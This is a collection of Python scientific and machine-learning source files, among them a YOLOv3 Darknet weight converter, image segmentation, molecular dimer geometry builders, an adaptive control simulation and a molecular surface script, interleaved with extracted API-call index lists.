'plt.grid', (['(True)'], {}), '(True)\n', (12396, 12402), True, 'import matplotlib.pyplot as plt\n'), ((12499, 12539), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(filename + '.histogram.png')"], {}), "(filename + '.histogram.png')\n", (12510, 12539), True, 'import matplotlib.pyplot as plt\n'), ((10799, 10813), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['xl'], {}), '(xl)\n', (10809, 10813), True, 'import matplotlib.pyplot as plt\n'), ((10830, 10844), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['yl'], {}), '(yl)\n', (10840, 10844), True, 'import matplotlib.pyplot as plt\n'), ((12099, 12155), 'matplotlib.pyplot.bar', 'plt.bar', (['x', 'y'], {'width': 'width', 'color': 'colors', 'align': '"""center"""'}), "(x, y, width=width, color=colors, align='center')\n", (12106, 12155), True, 'import matplotlib.pyplot as plt\n'), ((12218, 12232), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['xl'], {}), '(xl)\n', (12228, 12232), True, 'import matplotlib.pyplot as plt\n'), ((12249, 12263), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['yl'], {}), '(yl)\n', (12259, 12263), True, 'import matplotlib.pyplot as plt\n'), ((9627, 9636), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (9634, 9636), True, 'import matplotlib.pyplot as plt\n'), ((12360, 12375), 'matplotlib.pyplot.xlim', 'plt.xlim', (['(-5)', '(5)'], {}), '(-5, 5)\n', (12368, 12375), True, 'import matplotlib.pyplot as plt\n'), ((12292, 12302), 'matplotlib.pyplot.xlim', 'plt.xlim', ([], {}), '()\n', (12300, 12302), True, 'import matplotlib.pyplot as plt\n')]
|
import torch.nn as nn
import numpy as np
import torch
import os
from detectron2.config import get_cfg
from detectron2.engine import DefaultTrainer, default_argument_parser, default_setup, launch
from detectron2.evaluation import COCOEvaluator, verify_results
from yolov3 import add_yolov3_config
def load_darknet_weights(weights, modules):
with open(weights, 'rb') as f:
# (int32) version info: major, minor, revision
version = np.fromfile(f, dtype=np.int32, count=3)
# (int64) number of images seen during training
seen = np.fromfile(f, dtype=np.int64, count=1)
# the rest are weights
weights = np.fromfile(f, dtype=np.float32)
print(version, seen)
print(weights.shape)
ptr = 0
paired_modules = []
param_count = 0
for i, module in enumerate(modules):
if isinstance(module, nn.Conv2d):
if not module.bias is None:
paired_modules.append([module])
param_count += module.weight.numel()
param_count += module.bias.numel()
else:
paired_modules.append([module, modules[i+1]])
param_count += module.weight.numel()
param_count += modules[i+1].bias.numel() * 4
print("param_count:", param_count)
for conv_bn_modules in paired_modules:
conv = conv_bn_modules[0]
bn = conv_bn_modules[1] if len(conv_bn_modules) == 2 else None
out_channel, in_channel, kernel_h, kernel_w = conv.weight.size()
if bn:
assert bn.bias.size()[0] == out_channel, "conv and bn is not paired"
# Bias
bn_b = torch.from_numpy(weights[ptr:ptr + out_channel]).view_as(bn.bias)
bn.bias.data.copy_(bn_b)
ptr += out_channel
# Weight
bn_w = torch.from_numpy(weights[ptr:ptr + out_channel]).view_as(bn.weight)
bn.weight.data.copy_(bn_w)
ptr += out_channel
# Running Mean
bn_rm = torch.from_numpy(weights[ptr:ptr + out_channel]).view_as(bn.running_mean)
bn.running_mean.data.copy_(bn_rm)
ptr += out_channel
# Running Var
bn_rv = torch.from_numpy(weights[ptr:ptr + out_channel]).view_as(bn.running_var)
bn.running_var.data.copy_(bn_rv)
ptr += out_channel
else:
# Load conv. bias
conv_b = torch.from_numpy(weights[ptr:ptr + out_channel]).view_as(conv.bias)
conv.bias.data.copy_(conv_b)
ptr += out_channel
# Load conv. weights
num_w = conv.weight.numel()
conv_w = torch.from_numpy(weights[ptr:ptr + num_w]).view_as(conv.weight)
conv.weight.data.copy_(conv_w)
ptr += num_w
print("parsed:", ptr)
print("succeed.")
def setup(args):
"""
Create configs and perform basic setups.
"""
cfg = get_cfg()
add_yolov3_config(cfg)
cfg.merge_from_file(args.config_file)
cfg.merge_from_list(args.opts)
cfg.freeze()
default_setup(cfg, args)
return cfg
def main(args):
cfg = setup(args)
model = DefaultTrainer.build_model(cfg)
modules = model.get_conv_bn_modules()
for m in modules:
print(m.weight.size())
load_darknet_weights(args.initial_weights, modules)
save_path = os.path.join(args.output_dir, "yolov3.pth")
torch.save(model.state_dict(), save_path)
print("model save to", save_path)
if __name__ == "__main__":
parser = default_argument_parser()
parser.add_argument("--initial_weights", metavar="FILE", help="path to initial weights file")
parser.add_argument("--output_dir", help="dir to save weights file")
args = parser.parse_args()
print("Command Line Args:", args)
launch(
main,
args.num_gpus,
num_machines=args.num_machines,
machine_rank=args.machine_rank,
dist_url=args.dist_url,
args=(args,),
)
|
[
"numpy.fromfile",
"yolov3.add_yolov3_config",
"detectron2.config.get_cfg",
"detectron2.engine.DefaultTrainer.build_model",
"os.path.join",
"torch.from_numpy",
"detectron2.engine.launch",
"detectron2.engine.default_setup",
"detectron2.engine.default_argument_parser"
] |
[((2929, 2938), 'detectron2.config.get_cfg', 'get_cfg', ([], {}), '()\n', (2936, 2938), False, 'from detectron2.config import get_cfg\n'), ((2943, 2965), 'yolov3.add_yolov3_config', 'add_yolov3_config', (['cfg'], {}), '(cfg)\n', (2960, 2965), False, 'from yolov3 import add_yolov3_config\n'), ((3064, 3088), 'detectron2.engine.default_setup', 'default_setup', (['cfg', 'args'], {}), '(cfg, args)\n', (3077, 3088), False, 'from detectron2.engine import DefaultTrainer, default_argument_parser, default_setup, launch\n'), ((3156, 3187), 'detectron2.engine.DefaultTrainer.build_model', 'DefaultTrainer.build_model', (['cfg'], {}), '(cfg)\n', (3182, 3187), False, 'from detectron2.engine import DefaultTrainer, default_argument_parser, default_setup, launch\n'), ((3355, 3398), 'os.path.join', 'os.path.join', (['args.output_dir', '"""yolov3.pth"""'], {}), "(args.output_dir, 'yolov3.pth')\n", (3367, 3398), False, 'import os\n'), ((3525, 3550), 'detectron2.engine.default_argument_parser', 'default_argument_parser', ([], {}), '()\n', (3548, 3550), False, 'from detectron2.engine import DefaultTrainer, default_argument_parser, default_setup, launch\n'), ((3795, 3929), 'detectron2.engine.launch', 'launch', (['main', 'args.num_gpus'], {'num_machines': 'args.num_machines', 'machine_rank': 'args.machine_rank', 'dist_url': 'args.dist_url', 'args': '(args,)'}), '(main, args.num_gpus, num_machines=args.num_machines, machine_rank=\n args.machine_rank, dist_url=args.dist_url, args=(args,))\n', (3801, 3929), False, 'from detectron2.engine import DefaultTrainer, default_argument_parser, default_setup, launch\n'), ((452, 491), 'numpy.fromfile', 'np.fromfile', (['f'], {'dtype': 'np.int32', 'count': '(3)'}), '(f, dtype=np.int32, count=3)\n', (463, 491), True, 'import numpy as np\n'), ((563, 602), 'numpy.fromfile', 'np.fromfile', (['f'], {'dtype': 'np.int64', 'count': '(1)'}), '(f, dtype=np.int64, count=1)\n', (574, 602), True, 'import numpy as np\n'), ((652, 684), 'numpy.fromfile', 'np.fromfile', (['f'], {'dtype': 'np.float32'}), '(f, dtype=np.float32)\n', (663, 684), True, 'import numpy as np\n'), ((2664, 2706), 'torch.from_numpy', 'torch.from_numpy', (['weights[ptr:ptr + num_w]'], {}), '(weights[ptr:ptr + num_w])\n', (2680, 2706), False, 'import torch\n'), ((1672, 1720), 'torch.from_numpy', 'torch.from_numpy', (['weights[ptr:ptr + out_channel]'], {}), '(weights[ptr:ptr + out_channel])\n', (1688, 1720), False, 'import torch\n'), ((1846, 1894), 'torch.from_numpy', 'torch.from_numpy', (['weights[ptr:ptr + out_channel]'], {}), '(weights[ptr:ptr + out_channel])\n', (1862, 1894), False, 'import torch\n'), ((2031, 2079), 'torch.from_numpy', 'torch.from_numpy', (['weights[ptr:ptr + out_channel]'], {}), '(weights[ptr:ptr + out_channel])\n', (2047, 2079), False, 'import torch\n'), ((2228, 2276), 'torch.from_numpy', 'torch.from_numpy', (['weights[ptr:ptr + out_channel]'], {}), '(weights[ptr:ptr + out_channel])\n', (2244, 2276), False, 'import torch\n'), ((2442, 2490), 'torch.from_numpy', 'torch.from_numpy', (['weights[ptr:ptr + out_channel]'], {}), '(weights[ptr:ptr + out_channel])\n', (2458, 2490), False, 'import torch\n')]
|
import matplotlib.pyplot as plt
import numpy as np
import cv2
from skimage.data import astronaut
from skimage.color import rgb2gray
from skimage.filters import sobel
from skimage.segmentation import felzenszwalb, slic, quickshift, watershed
from skimage.segmentation import mark_boundaries
from skimage.util import img_as_float
image_path=r'/home/ccjunio/PycharmProjects/thermo_images/testes/images/dorso_costa00.jpeg'
img=cv2.imread(image_path)
# img = img_as_float(astronaut()[::2, ::2])
segments_fz = felzenszwalb(img, scale=100, sigma=0.5, min_size=50)
segments_slic = slic(img, n_segments=250, compactness=10, sigma=1)
segments_quick = quickshift(img, kernel_size=3, max_dist=6, ratio=0.5)
gradient = sobel(rgb2gray(img))
segments_watershed = watershed(gradient, markers=250, compactness=0.001)
print("Felzenszwalb number of segments: {}".format(len(np.unique(segments_fz))))
print('SLIC number of segments: {}'.format(len(np.unique(segments_slic))))
print('Quickshift number of segments: {}'.format(len(np.unique(segments_quick))))
fig, ax = plt.subplots(2, 2, figsize=(10, 10), sharex=True, sharey=True)
ax[0, 0].imshow(mark_boundaries(img, segments_fz))
ax[0, 0].set_title("Felzenszwalbs's method")
ax[0, 1].imshow(mark_boundaries(img, segments_slic))
ax[0, 1].set_title('SLIC')
ax[1, 0].imshow(mark_boundaries(img, segments_quick))
ax[1, 0].set_title('Quickshift')
ax[1, 1].imshow(mark_boundaries(img, segments_watershed))
# ax[1, 1].imshow(mark_boundaries(img, segments_watershed))
ax[1, 1].set_title('Compact watershed')
for a in ax.ravel():
a.set_axis_off()
plt.tight_layout()
plt.show()
|
[
"skimage.color.rgb2gray",
"skimage.segmentation.mark_boundaries",
"numpy.unique",
"matplotlib.pyplot.show",
"skimage.segmentation.watershed",
"skimage.segmentation.felzenszwalb",
"matplotlib.pyplot.subplots",
"matplotlib.pyplot.tight_layout",
"skimage.segmentation.quickshift",
"skimage.segmentation.slic",
"cv2.imread"
] |
[((425, 447), 'cv2.imread', 'cv2.imread', (['image_path'], {}), '(image_path)\n', (435, 447), False, 'import cv2\n'), ((507, 559), 'skimage.segmentation.felzenszwalb', 'felzenszwalb', (['img'], {'scale': '(100)', 'sigma': '(0.5)', 'min_size': '(50)'}), '(img, scale=100, sigma=0.5, min_size=50)\n', (519, 559), False, 'from skimage.segmentation import felzenszwalb, slic, quickshift, watershed\n'), ((576, 626), 'skimage.segmentation.slic', 'slic', (['img'], {'n_segments': '(250)', 'compactness': '(10)', 'sigma': '(1)'}), '(img, n_segments=250, compactness=10, sigma=1)\n', (580, 626), False, 'from skimage.segmentation import felzenszwalb, slic, quickshift, watershed\n'), ((644, 697), 'skimage.segmentation.quickshift', 'quickshift', (['img'], {'kernel_size': '(3)', 'max_dist': '(6)', 'ratio': '(0.5)'}), '(img, kernel_size=3, max_dist=6, ratio=0.5)\n', (654, 697), False, 'from skimage.segmentation import felzenszwalb, slic, quickshift, watershed\n'), ((751, 802), 'skimage.segmentation.watershed', 'watershed', (['gradient'], {'markers': '(250)', 'compactness': '(0.001)'}), '(gradient, markers=250, compactness=0.001)\n', (760, 802), False, 'from skimage.segmentation import felzenszwalb, slic, quickshift, watershed\n'), ((1053, 1115), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(2)', '(2)'], {'figsize': '(10, 10)', 'sharex': '(True)', 'sharey': '(True)'}), '(2, 2, figsize=(10, 10), sharex=True, sharey=True)\n', (1065, 1115), True, 'import matplotlib.pyplot as plt\n'), ((1582, 1600), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (1598, 1600), True, 'import matplotlib.pyplot as plt\n'), ((1601, 1611), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1609, 1611), True, 'import matplotlib.pyplot as plt\n'), ((715, 728), 'skimage.color.rgb2gray', 'rgb2gray', (['img'], {}), '(img)\n', (723, 728), False, 'from skimage.color import rgb2gray\n'), ((1133, 1166), 'skimage.segmentation.mark_boundaries', 'mark_boundaries', (['img', 'segments_fz'], {}), '(img, segments_fz)\n', (1148, 1166), False, 'from skimage.segmentation import mark_boundaries\n'), ((1229, 1264), 'skimage.segmentation.mark_boundaries', 'mark_boundaries', (['img', 'segments_slic'], {}), '(img, segments_slic)\n', (1244, 1264), False, 'from skimage.segmentation import mark_boundaries\n'), ((1309, 1345), 'skimage.segmentation.mark_boundaries', 'mark_boundaries', (['img', 'segments_quick'], {}), '(img, segments_quick)\n', (1324, 1345), False, 'from skimage.segmentation import mark_boundaries\n'), ((1396, 1436), 'skimage.segmentation.mark_boundaries', 'mark_boundaries', (['img', 'segments_watershed'], {}), '(img, segments_watershed)\n', (1411, 1436), False, 'from skimage.segmentation import mark_boundaries\n'), ((859, 881), 'numpy.unique', 'np.unique', (['segments_fz'], {}), '(segments_fz)\n', (868, 881), True, 'import numpy as np\n'), ((932, 956), 'numpy.unique', 'np.unique', (['segments_slic'], {}), '(segments_slic)\n', (941, 956), True, 'import numpy as np\n'), ((1013, 1038), 'numpy.unique', 'np.unique', (['segments_quick'], {}), '(segments_quick)\n', (1022, 1038), True, 'import numpy as np\n')]
|
import pytest
from hyperloop.Python.mission import lat_long
import numpy as np
from openmdao.api import Group, Problem
def create_problem(component):
root = Group()
prob = Problem(root)
prob.root.add('comp', component)
return prob
class TestMissionDrag(object):
def test_case1_vs_npss(self):
component = lat_long.LatLong()
prob = create_problem(component)
prob.setup()
prob['comp.x'] = 100.0
prob['comp.y'] = 100.0
prob['comp.lat_origin'] = 35.0
prob['comp.long_origin'] = -121.0
prob['comp.R_E'] = 6378.0
prob.run()
assert np.isclose(prob['comp.lat'], 35.898335, rtol = 0.01)
assert np.isclose(prob['comp.long'], -119.891025, rtol = 0.01)
|
[
"hyperloop.Python.mission.lat_long.LatLong",
"numpy.isclose",
"openmdao.api.Problem",
"openmdao.api.Group"
] |
[((162, 169), 'openmdao.api.Group', 'Group', ([], {}), '()\n', (167, 169), False, 'from openmdao.api import Group, Problem\n'), ((181, 194), 'openmdao.api.Problem', 'Problem', (['root'], {}), '(root)\n', (188, 194), False, 'from openmdao.api import Group, Problem\n'), ((338, 356), 'hyperloop.Python.mission.lat_long.LatLong', 'lat_long.LatLong', ([], {}), '()\n', (354, 356), False, 'from hyperloop.Python.mission import lat_long\n'), ((634, 684), 'numpy.isclose', 'np.isclose', (["prob['comp.lat']", '(35.898335)'], {'rtol': '(0.01)'}), "(prob['comp.lat'], 35.898335, rtol=0.01)\n", (644, 684), True, 'import numpy as np\n'), ((702, 755), 'numpy.isclose', 'np.isclose', (["prob['comp.long']", '(-119.891025)'], {'rtol': '(0.01)'}), "(prob['comp.long'], -119.891025, rtol=0.01)\n", (712, 755), True, 'import numpy as np\n')]
|
from pyqchem.structure import Structure
import numpy as np
# Ethene parallel position
def dimer_ethene(distance, slide_y, slide_z):
coordinates = [[0.0000000, 0.0000000, 0.6660120],
[0.0000000, 0.0000000, -0.6660120],
[0.0000000, 0.9228100, 1.2279200],
[0.0000000, -0.9228100, 1.2279200],
[0.0000000, -0.9228100, -1.2279200],
[0.0000000, 0.9228100, -1.2279200],
[distance, 0.0000000, 0.6660120],
[distance, 0.0000000, -0.6660120],
[distance, 0.9228100, 1.2279200],
[distance, -0.9228100, 1.2279200],
[distance, -0.9228100, -1.2279200],
[distance, 0.9228100, -1.2279200]]
coordinates = np.array(coordinates)
coordinates[6:, 1] = coordinates[6:, 1] + slide_y
coordinates[6:, 2] = coordinates[6:, 2] + slide_z
symbols = ['C', 'C', 'H', 'H', 'H', 'H', 'C', 'C', 'H', 'H', 'H', 'H']
molecule = Structure(coordinates=coordinates,
symbols=symbols,
charge=0)
return molecule, {'state_threshold': 0.2,
'n_mon': 6}
# Tetracloroethene
def dimer_tetrafluoroethene(distance, slide_y, slide_z):
monomer = [[ 0.6624670117, 0.0000000000, 0.0000000000],
[-0.6624670117, 0.0000000000, 0.0000000000],
[ 1.3834661472, 1.0993897934, 0.0000000000],
[ 1.3834661472, -1.0993897934, 0.0000000000],
[-1.3834661472, -1.0993897934, 0.0000000000],
[-1.3834661472, 1.0993897934, 0.0000000000]]
symbols = ['C', 'C', 'F', 'F', 'F', 'F']
monomer2 = np.array(monomer)
#monomer2 = np.dot(monomer, rotation_matrix([0, 1, 0], np.pi / 2))
monomer2[:, 2] = monomer2[:, 2] + distance
monomer2[:, 1] = monomer2[:, 1] + slide_y
monomer2[:, 0] = monomer2[:, 0] + slide_z
coordinates = np.vstack([monomer, monomer2])
molecule = Structure(coordinates=coordinates,
symbols=symbols * 2,
charge=0)
return molecule, {'state_threshold': 0.2,
'n_mon': len(monomer)}
# Tetracloroethene
def dimer_mix(distance, slide_y, slide_z):
monomer1 = [[ 0.6660120, 0.0000000, 0.0000000,],
[-0.6660120, 0.0000000, 0.0000000,],
[ 1.2279200, 0.9228100, 0.0000000,],
[ 1.2279200, -0.9228100, 0.0000000,],
[-1.2279200, -0.9228100, 0.0000000,],
[-1.2279200, 0.9228100, 0.0000000,]]
symbols1 = ['C', 'C', 'H', 'H', 'H', 'H']
monomer2 = [[ 0.6624670117, 0.0000000000, 0.0000000000],
[-0.6624670117, 0.0000000000, 0.0000000000],
[ 1.3834661472, 1.0993897934, 0.0000000000],
[ 1.3834661472, -1.0993897934, 0.0000000000],
[-1.3834661472, -1.0993897934, 0.0000000000],
[-1.3834661472, 1.0993897934, 0.0000000000]]
symbols2 = ['C', 'C', 'F', 'F', 'F', 'F']
monomer2 = np.array(monomer2)
monomer2[:, 2] = monomer2[:, 2] + distance
monomer2[:, 1] = monomer2[:, 1] + slide_y
monomer2[:, 0] = monomer2[:, 0] + slide_z
coordinates = np.vstack([monomer1, monomer2])
symbols = symbols1 + symbols2
molecule = Structure(coordinates=coordinates,
symbols=symbols,
charge=0)
return molecule, {'state_threshold': 0.4,
'n_mon': len(monomer1)}
|
[
"numpy.array",
"pyqchem.structure.Structure",
"numpy.vstack"
] |
[((826, 847), 'numpy.array', 'np.array', (['coordinates'], {}), '(coordinates)\n', (834, 847), True, 'import numpy as np\n'), ((1048, 1109), 'pyqchem.structure.Structure', 'Structure', ([], {'coordinates': 'coordinates', 'symbols': 'symbols', 'charge': '(0)'}), '(coordinates=coordinates, symbols=symbols, charge=0)\n', (1057, 1109), False, 'from pyqchem.structure import Structure\n'), ((1748, 1765), 'numpy.array', 'np.array', (['monomer'], {}), '(monomer)\n', (1756, 1765), True, 'import numpy as np\n'), ((1995, 2025), 'numpy.vstack', 'np.vstack', (['[monomer, monomer2]'], {}), '([monomer, monomer2])\n', (2004, 2025), True, 'import numpy as np\n'), ((2042, 2107), 'pyqchem.structure.Structure', 'Structure', ([], {'coordinates': 'coordinates', 'symbols': '(symbols * 2)', 'charge': '(0)'}), '(coordinates=coordinates, symbols=symbols * 2, charge=0)\n', (2051, 2107), False, 'from pyqchem.structure import Structure\n'), ((3128, 3146), 'numpy.array', 'np.array', (['monomer2'], {}), '(monomer2)\n', (3136, 3146), True, 'import numpy as np\n'), ((3306, 3337), 'numpy.vstack', 'np.vstack', (['[monomer1, monomer2]'], {}), '([monomer1, monomer2])\n', (3315, 3337), True, 'import numpy as np\n'), ((3388, 3449), 'pyqchem.structure.Structure', 'Structure', ([], {'coordinates': 'coordinates', 'symbols': 'symbols', 'charge': '(0)'}), '(coordinates=coordinates, symbols=symbols, charge=0)\n', (3397, 3449), False, 'from pyqchem.structure import Structure\n')]
|
#!/usr/bin/env python3
"""
Adaptive Affine Control:
My favorite myopic (not MPC, DP, or RL) control-law when absolutely nothing is known about your system except
that the control is additive and fully-actuated:
```
dx/dt = f(x,t) + u # drift f unknown, state x at time t known, choose control u to make x=r
u = W.dot(x) + b # policy is affine function of state
dW/dt = outer(k*(r-x), x) # parameters are adapted (learned online) to oppose the...
db/dt = k*(r-x) # ... gradient of the error-energy-rate d/dt((k/2)*(r-x)^2)
```
Try this with any crazy f. Even throw in a B(x,t) transformation on u (though no guarantees for that).
It's basically PID but with the PD gains evolving according to the regression-like dW/dt I gave.
PID with stationary PD gains fails when the f is reasonably nonlinear. This law still works.
Of course, additive-control fully-actuated systems pretty much only model lame low-level problems, but still neat.
"""
# Dependencies
import numpy as np
from matplotlib import pyplot
##################################################
# Controller
class C:
def __init__(self, n, k):
self.n = int(n)
self.k = float(k)
self.W = np.zeros((n, n), dtype=float)
self.b = np.zeros(n, dtype=float)
def u(self, r, x, dt):
ked = self.k*(r - x)*dt
self.W += np.outer(ked, x)
self.b += ked
return self.W.dot(x) + self.b
##################################################
# Drift dynamic
n = 3
def f(x, t):
return np.array([10.0*(x[1] - x[0]),
x[0]*(28.0 - x[2]) - x[1],
x[0]*x[1] - 2.6*x[2]])
# Actuator dynamic
# (needs to be identity for Lyapunov proof, but might still work otherwise)
def B(x, t):
return np.array([[x[1], 0.0, 0.0],
[ 0.0, 2*x[0], 0.0],
[ 0.0, 0.0, 1.0]])
##################################################
# Time
dt = 0.001
T = np.arange(0.0, 3.0, dt)
# State
X = np.zeros((len(T), n), dtype=float)
X[0] = [-1.0, 2.0, 3.0]
# Control
U = np.zeros((len(T), n), dtype=float)
c = C(n, 1.0)
# Reference
R = np.array([[6.0, 7.0, -7.0]] * len(T))
##################################################
# Simulation
control = True
for i in range(len(T)-1):
if control: U[i] = c.u(R[i], X[i], dt)
dxdt = f(X[i], T[i]) + B(X[i], T[i]).dot(U[i])
X[i+1] = X[i] + dxdt*dt
##################################################
# Plot
fig = pyplot.figure()
if control: fig.suptitle("Controlled Response", fontsize=26)
else: fig.suptitle("Natural Response", fontsize=26)
ax = None
for i in range(n):
ax = fig.add_subplot(n, 1, i+1, sharex=ax)
ax.plot(T, X[:, i], color='b', linewidth=2, label="state")
ax.plot(T, R[:, i], color='g', linewidth=3, linestyle=':', label="desire")
ax.plot(T[:-1], U[:-1, i], color='r', linewidth=0.5, label="action", scaley=False)
ax.set_xlim([T[0], T[-1]])
ax.set_ylabel("state "+str(i), fontsize=20)
ax.grid(True)
ax.set_xlabel("time", fontsize=20)
ax.legend()
pyplot.show()
|
[
"numpy.array",
"matplotlib.pyplot.figure",
"numpy.zeros",
"numpy.outer",
"numpy.arange",
"matplotlib.pyplot.show"
] |
[((1963, 1986), 'numpy.arange', 'np.arange', (['(0.0)', '(3.0)', 'dt'], {}), '(0.0, 3.0, dt)\n', (1972, 1986), True, 'import numpy as np\n'), ((2473, 2488), 'matplotlib.pyplot.figure', 'pyplot.figure', ([], {}), '()\n', (2486, 2488), False, 'from matplotlib import pyplot\n'), ((3051, 3064), 'matplotlib.pyplot.show', 'pyplot.show', ([], {}), '()\n', (3062, 3064), False, 'from matplotlib import pyplot\n'), ((1530, 1622), 'numpy.array', 'np.array', (['[10.0 * (x[1] - x[0]), x[0] * (28.0 - x[2]) - x[1], x[0] * x[1] - 2.6 * x[2]]'], {}), '([10.0 * (x[1] - x[0]), x[0] * (28.0 - x[2]) - x[1], x[0] * x[1] - \n 2.6 * x[2]])\n', (1538, 1622), True, 'import numpy as np\n'), ((1772, 1839), 'numpy.array', 'np.array', (['[[x[1], 0.0, 0.0], [0.0, 2 * x[0], 0.0], [0.0, 0.0, 1.0]]'], {}), '([[x[1], 0.0, 0.0], [0.0, 2 * x[0], 0.0], [0.0, 0.0, 1.0]])\n', (1780, 1839), True, 'import numpy as np\n'), ((1205, 1234), 'numpy.zeros', 'np.zeros', (['(n, n)'], {'dtype': 'float'}), '((n, n), dtype=float)\n', (1213, 1234), True, 'import numpy as np\n'), ((1252, 1276), 'numpy.zeros', 'np.zeros', (['n'], {'dtype': 'float'}), '(n, dtype=float)\n', (1260, 1276), True, 'import numpy as np\n'), ((1354, 1370), 'numpy.outer', 'np.outer', (['ked', 'x'], {}), '(ked, x)\n', (1362, 1370), True, 'import numpy as np\n')]
|
#!/usr/bin/python3.7
#Author: <NAME>
import sys
import os
import math
import re
import numpy as np
#print('usage: <>.py <file.pdb> \nexecute nsc to generate point-based surface and create tables and if verbose==1 files dotslabel1.xyzrgb dotslabel2.xyzrgb dotslabel3.xyzrgb and dotslabel4.xyzrgb\n')
def pdbsurface(filepdb,nscexe):
verbose=0
#label1 {H, Cl, Br, I} white/grey 0.9 0.9 0.9
#label2 {O, N, S, F} red 1 0 0
#label3 {C, P, B} green 0 1 0
#label4 {others} blue 0 0 1
tabR= {'C':'%.2f' % 1.70, 'O':1.52, 'N':1.55, 'S':1.80, 'P':1.80, 'B':1.72, 'Br':1.85, 'Cl':1.75, 'I':1.98, 'F':1.47, 'H':'%.2f' % 1.20, 'Hp':'%.2f' % 1.10, 'X':'%.2f' % 1.10}
label= {'C':3, 'P':3, 'B':3, 'O':2, 'N':2, 'S':2, 'F':2, 'Hp':2, 'H':1, 'Cl':1, 'Br':1, 'I':1}
rgb= np.array([[0, 0, 0], [0.9, 0.9, 0.9], [1, 0, 0], [0, 1, 0], [0, 0, 1]])
espace5=' '
espace6=' '
fichier2D=0
filepdb=open(filepdb,'r')
getstr=filepdb.read().split('\n')
filepdb.close()
tabLignesPdb=[]
tabLignesPdb.append('')
compt=1
while (compt < len(getstr)):
tabLignesPdb.append(re.split('\s+', getstr[compt].strip()))
compt=compt+1
compt=1
comptatomes=0
getx=[]
getx.append('')
gety=[]
gety.append('')
getz=[]
getz.append('')
getA=[]
getA.append('')
getRayon=[]
getRayon.append('')
while (compt < len(tabLignesPdb)):
if (tabLignesPdb[compt][0] == 'HETATM' or tabLignesPdb[compt][0] == 'ATOM'):
xAtome=float(tabLignesPdb[compt][5])
yAtome=float(tabLignesPdb[compt][6])
zAtome=float(tabLignesPdb[compt][7])
getx.append(xAtome)
gety.append(yAtome)
getz.append(zAtome)
if (float(zAtome) == 0):
fichier2D=fichier2D+1
getA.append(tabLignesPdb[compt][2])
if(getA[compt]!='C' and getA[compt]!='O' and getA[compt]!='N' and getA[compt]!='P' and getA[compt]!='B' and getA[compt]!='H' and getA[compt]!='F' and getA[compt]!='Br' and getA[compt]!='Cl' and getA[compt]!='S' and getA[compt]!='I' and getA[compt]!='X' and getA[compt]!='Hp'):
print("Warning: atom %s set as C because it is not the tab (unusual in medchem)" % getA[compt])
getA[compt]='C'
getRayon.append(tabR[getA[compt]])
comptatomes=comptatomes+1
compt=compt+1
nbatomes=comptatomes
if (fichier2D==int(nbatomes)):
print("Warning: pdb file in 2D; SenSaaS needs 3D coordinates to work properly")
compt=1
while (compt <= nbatomes):
if (getA[compt] == 'H'):
compt2=1
while(compt2 <= nbatomes):
if (getA[compt2] == 'N' or getA[compt2] == 'O'):
distHp= math.sqrt((getx[compt] - getx[compt2])**2 + (gety[compt] - gety[compt2])**2 + (getz[compt] - getz[compt2])**2)
if (distHp <= 1.2):
getRayon[compt]=tabR['Hp']
compt2=compt2+1
compt=compt+1
#nsc:
compt=1
psaIn=open('psa.in','w')
psaIn.write('* XYZR\n')
psaIn.write(espace6+str(nbatomes)+'\n')
while (compt <= nbatomes):
x='%.2f' % getx[compt]
y='%.2f' % gety[compt]
z='%.2f' % getz[compt]
psaIn.write('%8s %8s %8s %8s %8s \n'%(x,y,z,getRayon[compt],getA[compt]))
compt=compt+1
psaIn.close()
cmd = '%s psa.in ' % (nscexe)
os.system(cmd)
psaOut=open('psa.out', 'r')
lignepsaOut= psaOut.readlines()
psaOut.close()
tabLignesPsaOut=[]
compt=3
while (compt < len(lignepsaOut)):
tabLignesPsaOut.append(re.split('\s+', lignepsaOut[compt].strip()))
compt=compt+1
nbDots= int(tabLignesPsaOut[0][2])
#print("nbDots= %6s" % (nbDots))
del tabLignesPsaOut[0]
del tabLignesPsaOut[0]
getDots=np.empty(shape=[nbDots,3], dtype='float64')
getrgb=np.empty(shape=[nbDots,3], dtype='float64')
compt=nbatomes+2
comptDots=0
ligneFicDots=[]
label1=[]
label2=[]
label3=[]
label4=[]
if(verbose==1):
dotsFic=open('dots.xyzrgb', 'w')
while (compt < nbatomes+nbDots+2):
xDot=float(tabLignesPsaOut[compt][2])
yDot=float(tabLignesPsaOut[compt][3])
zDot=float(tabLignesPsaOut[compt][4])
compt2=1
m=100
mi=0
while(compt2 <= nbatomes):
xa=getx[compt2]
ya=gety[compt2]
za=getz[compt2]
goodDots= math.sqrt((xDot - xa)**2 + (yDot - ya)**2 + (zDot - za)**2)
if(goodDots < m):
m=goodDots
mi=compt2
compt2=compt2+1
atomeCorrespondant=getA[mi]
rgbi=label[atomeCorrespondant]
if(getRayon[mi]==tabR['Hp']):
rgbi=label['O']
getrgb[comptDots,:]=[rgb[rgbi,0], rgb[rgbi,1], rgb[rgbi,2]]
getDots[comptDots,:]=[xDot,yDot,zDot]
if (rgbi == 1):
label1.append(np.vstack([getDots[comptDots], getrgb[comptDots]]))
elif (rgbi == 2):
label2.append(np.vstack([getDots[comptDots], getrgb[comptDots]]))
elif (rgbi == 3):
label3.append(np.vstack([getDots[comptDots], getrgb[comptDots]]))
elif (rgbi == 4):
label4.append(np.vstack([getDots[comptDots], getrgb[comptDots]]))
else:
print("no label for dot no %5s ?\n" %(comptDots))
if(verbose==1):
dotsFic.write('%8s'%xDot+'%8s'%yDot+'%8s'%zDot+espace5+'%5s'%(rgb[rgbi,0])+'%5s'%(rgb[rgbi,1])+'%5s'%(rgb[rgbi,2])+'\n')
comptDots=comptDots+1
compt=compt+1
if(verbose==1):
dotsFic.close()
dotslabel1=open('dotslabel1.xyzrgb', 'w')
dotslabel2=open('dotslabel2.xyzrgb', 'w')
dotslabel3=open('dotslabel3.xyzrgb', 'w')
dotslabel4=open('dotslabel4.xyzrgb', 'w')
getDots1=np.empty(shape=[len(label1),3], dtype='float64')
getrgb1=np.empty(shape=[len(label1),3], dtype='float64')
